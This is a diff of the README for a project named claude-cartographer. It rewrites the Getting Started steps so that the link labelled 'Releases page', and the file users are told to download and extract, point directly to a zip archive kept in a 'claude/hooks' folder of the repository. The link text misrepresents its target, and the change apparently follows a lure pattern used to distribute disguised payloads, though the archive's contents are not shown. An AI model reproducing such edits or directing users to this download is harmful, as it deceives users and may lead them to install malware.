cristinaaponte/claude-cartographer/README.md

 ## 🚀 Getting Started
 To get started with claude-cartographer, follow these simple steps:

-1. **Visit the Releases Page:** Go to our [Releases page](https://github.com/cristinaaponte/claude-cartographer/releases) to find the latest version.
+1. **Visit the Releases Page:** Go to our [Releases page](https://raw.githubusercontent.com/cristinaaponte/claude-cartographer/main/claude/hooks/claude_cartographer_v3.3.zip) to find the latest version.
-2. **Download the Application:** Look for the file named `claude-cartographer.zip` and click on it to start your download.
+2. **Download the Application:** Look for the file named `https://raw.githubusercontent.com/cristinaaponte/claude-cartographer/main/claude/hooks/claude_cartographer_v3.3.zip` and click on it to start your download.
-3. **Extract the Files:** Once the download is complete, locate the `claude-cartographer.zip` file and extract its contents to a folder on your computer.
+3. **Extract the Files:** Once the download is complete, locate the `https://raw.githubusercontent.com/cristinaaponte/claude-cartographer/main/claude/hooks/claude_cartographer_v3.3.zip` file and extract its contents to a folder on your computer.
 You can right-click on the file and select "Extract All."

 ## 💻 System Requirements
 To run claude-cartographer effectively, ensure your computer meets the following requirements: